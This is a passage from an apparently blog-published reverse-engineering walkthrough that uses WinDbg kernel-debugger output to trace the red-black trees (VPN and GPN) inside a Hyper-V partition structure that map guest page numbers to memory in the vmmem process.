<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [r13+57B0h]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_RtlRbRemoveNode</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At offset 0x57A0 and 0x57B0 Prtn-structure contains structures, that are goes as first parameter to nt!RtlRbRemoveNode function. We can see definition of that function in:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<a href="https://processhacker.sourceforge.io/doc/ntrtl_8h.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://processhacker.sourceforge.io/doc/ntrtl_8h.html</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(_In_ PRTL_RB_TREE Tree, _In_ PRTL_BALANCED_NODE Node)</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3: kd> dt -r1 nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Children : [2] Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Left : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Right : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Red : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Balance : Pos 0, 2 Bits</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ParentValue : Uint8B</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Children : [2] Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Left : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Right : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Red : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Balance : Pos 0, 2 Bits</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ParentValue : Uint8B</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This structure is red-black tree. I won’t go into theory (it can be googled easily), for result we need see all on practice, because we already have compiled code.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We have two VPN trees (probably, virtual page number) and GPN (guest page number), the vertex addresses of which are located at offsets 57A0h and 57B0h of the Prtn structure (for 20H1), respectively.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd88344414000+0x57a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197a0 ffffd883`44dc9b70 - VPN tree (_RTL_RB_TREE address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197a8 ffffd883`44dcb060 - VPN tree (_RTL_BALANCED_NODE root address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197b0 ffffd883`443b2890 - GPN tree (_RTL_RB_TREE address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197b8 ffffd883`48d75890 - GPN tree (_RTL_BALANCED_NODE root address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197c0 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197c8 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider each structure separately:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPN tree contains nodes and leaves, that contains, in addition to links to other tree’s elements, a payload — the guest page number addresses and a link to a VPN node, containing start and end addresses of the corresponding memory block in vmmem process.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dt _RTL_RB_TREE ffffd883`444197a0 – VPN tree</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : 0xffffd883`44dc9b70 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : 0y0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : 0xffffd883`44dcb060 _RTL_BALANCED_NODE</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dt _RTL_RB_TREE ffffd883`444197b0 – GPN tree</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : 0xffffd883`443b2890 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : 0y0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : 0xffffd883`48d75890 _RTL_BALANCED_NODE </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We will work with the GPN tree. The header looks something like this (you can see which node is black, which red)</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443b2890)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443b2890) : 0xffffd883443b2890 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd883443a8e10 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd88342f4a690 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0x0 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443a8e10)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd883443a8e10) : 0xffffd883443a8e10 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd88344398490 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd883443ae090 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x1 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x1 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0xffffd883443b2891 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dx -id 0,0,ffffd8833e087040 -r1 ((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd88344398490)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((ntkrnlmp!_RTL_BALANCED_NODE *)0xffffd88344398490) : 0xffffd88344398490 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Children [Type: _RTL_BALANCED_NODE * [2]]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Left : 0xffffd88348d75890 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] Right : 0xffffd88344398510 [Type: _RTL_BALANCED_NODE *]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 0: 0)] Red : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010 ( 1: 0)] Balance : 0x0 [Type: unsigned char]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] ParentValue : 0xffffd883443a8e10 [Type: unsigned __int64]</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> We are primarily interested in the payload, contained in the body of a tree leaf.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd88346564610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564610 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564618 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564620 ffffd883`46564910</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564628 ffffd883`4802e558</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564630 ffffd883`4802e558</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564638 fffffc0f`022a73a0</span></div>
</div>
